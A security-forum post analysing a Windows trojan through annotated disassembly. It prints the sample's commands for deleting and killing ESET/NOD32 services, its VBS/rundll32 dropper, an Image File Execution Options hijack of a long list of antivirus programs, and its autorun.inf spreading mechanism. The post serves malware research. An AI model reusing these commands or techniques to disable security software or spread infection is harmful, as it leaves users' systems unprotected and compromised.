好友
阅读权限10
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
1、新建任务管理器
PS______:13141530 push ebp
PS______:13141531 mov ebp, esp
PS______:13141533 sub esp, 324h
PS______:13141539 push ebx
PS______:1314153A mov ebx, MessageBoxA
PS______:13141540 push esi
PS______:13141541 push edi
PS______:13141542 push 0 ; uType
PS______:13141544 push offset aR0s0 ; "R0S0"
PS______:13141549 push offset aJinasn ; "JINASN"
PS______:1314154E push 0FFFFFFFFh ; hWnd
PS______:13141550 call ebx ; MessageBoxA ; 弹窗函数
PS______:13141552 nop
PS______:13141553 nop
PS______:13141554 lea eax, [ebp+FileName]
PS______:1314155A push 100h ; nSize
PS______:1314155F push eax ; lpFilename
PS______:13141560 push 0 ; hModule
PS______:13141562 call GetModuleFileNameA ; 获得句柄
PS______:13141568 push offset aCreatefilea ; "CreateFileA"
PS______:1314156D push offset aKernel32_dll ; "Kernel32.dll"
PS______:13141572 call LoadLibraryA ; 载入动态库
PS______:13141578 push eax ; hModule
PS______:13141579 call GetProcAddress ; 检索输出函数地址
PS______:1314157F lea ecx, [ebp+Buffer]
PS______:13141585 push 104h ; uSize
PS______:1314158A push ecx ; lpBuffer
PS______:1314158B mov dword_1314F99C, eax
PS______:13141590 call GetSystemDirectoryA ; c:\windows\system32
PS______:13141596 mov edi, offset aTaskmgr_exe ; "\\taskmgr.exe"
PS______:1314159B or ecx, 0FFFFFFFFh
PS______:1314159E xor eax, eax
PS______:131415A0 lea edx, [ebp+Buffer]
PS______:131415A6 repne scasb
PS______:131415A8 not ecx
PS______:131415AA sub edi, ecx
PS______:131415AC push eax
PS______:131415AD mov esi, edi
PS______:131415AF mov edi, edx
PS______:131415B1 mov edx, ecx
PS______:131415B3 or ecx, 0FFFFFFFFh
PS______:131415B6 repne scasb
PS______:131415B8 mov ecx, edx
PS______:131415BA dec edi
PS______:131415BB shr ecx, 2
PS______:131415BE rep movsd
PS______:131415C0 push 80h
PS______:131415C5 push 1
PS______:131415C7 push eax
PS______:131415C8 mov ecx, edx
PS______:131415CA push 1
PS______:131415CC push eax
PS______:131415CD and ecx, 3
PS______:131415D0 lea eax, [ebp+Buffer]
PS______:131415D6 rep movsb
PS______:131415D8 push eax
PS______:131415D9 call dword_1314F99C
PS______:131415DF cmp eax, 0FFFFFFFFh ; 比较
PS______:131415E2 jz short loc_131415EC ; 等于则跳,否则退出
PS______:131415E4 push 0 ; uExitCode
PS______:131415E6 call ExitProcess
2、创建互斥变量
loc_13141651: ; CODE XREF: start+EC�j
PS______:13141651 call GetInputState ; 判断是否有鼠标或键盘事件
PS______:13141657 push 0 ; lParam
PS______:13141659 push 0 ; wParam
PS______:1314165B push 0 ; Msg
PS______:1314165D call GetCurrentThreadId ; 获得进程id
PS______:13141663 push eax ; idThread
PS______:13141664 call PostThreadMessageA ; 投递消息
PS______:1314166A push 0 ; wMsgFilterMax
PS______:1314166C push 0 ; wMsgFilterMin
PS______:1314166E lea eax, [ebp+Msg]
PS______:13141671 push 0 ; hWnd
PS______:13141673 push eax ; lpMsg
PS______:13141674 call GetMessageA ; 获得投递的消息
PS______:1314167A push offset Name ; "GXYZUOGUOQ"
PS______:1314167F push 0 ; bInitialOwner
PS______:13141681 push 0 ; lpMutexAttributes
PS______:13141683 call CreateMutexA ; 创建互斥变量
PS______:13141689 mov esi, eax
PS______:1314168B call GetLastError
PS______:13141691 cmp eax, 0B7h
PS______:13141696 jnz short loc_131416B7
PS______:13141698 push esi ; hObject
PS______:13141699 call CloseHandle ; 关闭句柄
PS______:1314169F push 0 ; uType
PS______:131416A1 push offset a2120 ; "2120"
PS______:131416A6 push offset aXxv ; "xxv"
PS______:131416AB push 0FFFFFFFFh ; hWnd
PS______:131416AD call ebx ; MessageBoxA
PS______:131416AF push 0 ; uExitCode
PS______:131416B1 call ExitProcess
3、遍历进程 如有则进行关闭
loc_131416B7: ; CODE XREF: start+166�j
PS______:131416B7 call sub_13141AD0
PS______:131416BC mov edi, Sleep
PS______:131416C2 push 7D0h ; dwMilliseconds
PS______:131416C7 call edi ; Sleep ; 休眠
PS______:131416C9 push offset aEkrn_exe ; "ekrn.exe"
PS______:131416CE call sub_13141EC0 ; 遍历进程
PS______:131416D3 mov esi, WinExec
PS______:131416D9 add esp, 4
PS______:131416DC test eax, eax
PS______:131416DE jz short loc_131416FB ; 等则跳
PS______:131416E0 push 0 ; uCmdShow
PS______:131416E2 push offset CmdLine ; "cmd /c sc delete ekrn"
PS______:131416E7 call esi ; WinExec
PS______:131416E9 push 0 ; uCmdShow
PS______:131416EB push offset aCmdCTaskkillIm ; "cmd /c taskkill /im ekrn.exe /f"
PS______:131416F0 call esi ; WinExec
PS______:131416F2 push 0 ; uCmdShow
PS______:131416F4 push offset aCmdCTaskkill_0 ; "cmd /c taskkill /im egui.exe /f"
PS______:131416F9 call esi ; WinExec
PS______:131416FB
PS______:131416FB loc_131416FB: ; CODE XREF: start+1AE�j
PS______:131416FB push offset aNod32krn_exe ; "nod32krn.exe"
PS______:13141700 call sub_13141EC0 ; 遍历进程
PS______:13141705 add esp, 4
PS______:13141708 test eax, eax
PS______:1314170A jz short loc_13141727 ; 如果没有nod32krn.exe则跳;
PS______:1314170C push 0 ; uCmdShow
PS______:1314170E push offset aCmdCScDeleteNo ; "cmd /c sc delete nod32krn"
PS______:13141713 call esi ; WinExec ; 调用cmd停止nod32服务
PS______:13141715 push 0 ; uCmdShow
PS______:13141717 push offset aCmdCTaskkill_1 ; "cmd /c taskkill /im nod32krn.exe /f"
PS______:1314171C call esi ; WinExec ; 调用cmd关闭进程
PS______:1314171E push 0 ; uCmdShow
PS______:13141720 push offset aCmdCTaskkill_2 ; "cmd /c taskkill /im nod32kui.exe /f"
PS______:13141725 call esi ; WinExec ; 继续关闭
4、创建文件,释放autorun.inf,YYOZG.PIF,创建服务.
loc_13141727: ; CODE XREF: start+1DA�j
PS______:13141727 push 1770h ; dwMilliseconds
PS______:1314172C call edi ; Sleep
PS______:1314172E call sub_13141290 ; 创建文件c:\fepst.dll
PS______:1314172E ; 遍历CCenter.exe
PS______:1314172E ; 创建 系统目录\\Fonts\\lsvvs.VBS
PS______:1314172E ; 内容Set wshshell=wscript.CreateObject("WScript.Shell");
PS______:1314172E ; wshshell.run "rundll32 C:\fepst.dll,RSDK
PS______:1314172E ; 然后调用cscript.exe执行后删除
PS______:13141733 push 7D00h ; dwMilliseconds
PS______:13141738 call edi ; Sleep
PS______:1314173A mov esi, CreateThread
PS______:13141740 push 0 ; lpThreadId
PS______:13141742 push 0 ; dwCreationFlags
PS______:13141744 push 0 ; lpParameter
PS______:13141746 push offset StartAddress ; lpStartAddress
PS______:1314174B push 0 ; dwStackSize
PS______:1314174D push 0 ; lpThreadAttributes
PS______:1314174F call esi ; CreateThread
PS______:13141751 push 0 ; lpThreadId
PS______:13141753 push 0 ; dwCreationFlags
PS______:13141755 push 0 ; lpParameter
PS______:13141757 push offset sub_131410B0 ; lpStartAddress
PS______:1314175C push 0 ; dwStackSize
PS______:1314175E push 0 ; lpThreadAttributes
PS______:13141760 call esi ; CreateThread
PS______:13141762 push offset aCFepst_dll ; "C:\\fepst.dll"
PS______:13141767 call DeleteFileA ; 删除fepst.dll文件
PS______:1314176D push 3A98h ; dwMilliseconds
PS______:13141772 call edi ; Sleep
PS______:13141774 push 0 ; lpThreadId
PS______:13141776 push 0 ; dwCreationFlags
PS______:13141778 push 0 ; lpParameter
PS______:1314177A push offset sub_131410C0 ; 拷贝linkinfo.dll文件到system32下和dllcahe下面
PS______:1314177F push 0 ; dwStackSize
PS______:13141781 push 0 ; lpThreadAttributes
PS______:13141783 call esi ; CreateThread
PS______:13141785 push 2EE0h ; dwMilliseconds
PS______:1314178A call edi ; Sleep
PS______:1314178C push 0 ; lpThreadId
PS______:1314178E push 0 ; dwCreationFlags
PS______:13141790 push 0 ; lpParameter
PS______:13141792 push offset sub_13141080 ; 1、注册表Debug劫持SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution
PS______:13141792 ; 2、HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mysm
PS______:13141792 ; (Display Name)mysm = (IMAGEPATH)\??\%WINDOWS%\FONTS\MYSM.SYS
PS______:13141792 ; 创建服务
PS______:13141797 push 0 ; dwStackSize
PS______:13141799 push 0 ; lpThreadAttributes
PS______:1314179B call esi ; CreateThread
PS______:1314179D push 0 ; lpThreadId
PS______:1314179F push 0 ; dwCreationFlags
PS______:131417A1 push 0 ; lpParameter
PS______:131417A3 push offset sub_13141510 ; 各个盘符下释放YYOZG.PIF,AUTORUN.INF
PS______:131417A8 push 0 ; dwStackSize
PS______:131417AA push 0 ; lpThreadAttributes
PS______:131417AC call esi ; CreateThread
PS______:131417AE pop edi
PS______:131417AF pop esi
PS______:131417B0 mov eax, 1
PS______:131417B5 pop ebx
PS______:131417B6 mov esp, ebp
PS______:131417B8 pop ebp
PS______:131417B9 retn
PS______:131417B9 start endp
PS______:131417B9
5、Autorun.inf的内容:
[AutoRun]
shell\open=打开(&O)
shell\open\Command=YYOZG.PIF
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\command=YYOZG.PIF
6、劫持杀毒软件列表:
360rp.EXE
360rpt.EXE
360safe.EXE
360safebox.EXE
360safeup.EXE
360sd.EXE
360tray.EXE
360upp.EXE
ANTIARP.EXE
arpfw.EXE
ArSwp.EXE
Ast.EXE
AutoRun.EXE
AutoRunKiller.EXE
avgnt.EXE
AvMonitor.EXE
avp.EXE
CCenter.EXE
ccEvtMgr.EXE
ccSetMgr.EXE
egui.EXE
ekrn.EXE
Frameworkservice.EXE
GFUpd.EXE
GuardField.EXE
HijackThis.EXE
IceSword.EXE
Iparmor.EXE
KASARP.EXE
kav32.EXE
KAVPFW.EXE
kavstart.EXE
kissvc.EXE
kmailmon.EXE
KPfwSvc.EXE
KRegEx.EXE
krnl360svc.EXE
KSWebShield.EXE
KVMonxp.KXP
KVSrvXP.EXE
KVWSC.EXE
kwatch.EXE
LiveUpdate360.EXE
mcshield.EXE
Mmsk.EXE
naPrdMgr.EXE
Navapsvc.EXE
nod32krn.EXE
Nod32kui.EXE
PFW.EXE
QQDoctor.EXE
RAV.EXE
RavMon.EXE
RavMonD.EXE
Ravservice.EXE
RavStub.EXE
RavTask.EXE
RAVTRAY.EXE
Regedit.EXE
rfwmain.EXE
rfwProxy.EXE
rfwsrv.EXE
Rfwstub.EXE
RsAgent.EXE
Rsaupd.EXE
RsMain.EXE
rsnetsvr.EXE
RSTray.EXE
Rtvscan.EXE
Runiep.EXE
safeboxTray.EXE
ScanFrm.EXE
SREngLdr.EXE
TrojanDetector.EXE
Trojanwall.EXE
TrojDie.KXP
VPC32.EXE
VPTRAY.EXE
VsTskMgr.EXE
WOPTILITIES.EXE
ZhuDongFangYu.EXE
ps:因里面的嵌套的call太多 不一一列出 只列了下最外面的函数。因初学分析,如有失误,敬请指点。o(∩_∩)o... |
免费评分
-
查看全部评分
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|
|
|
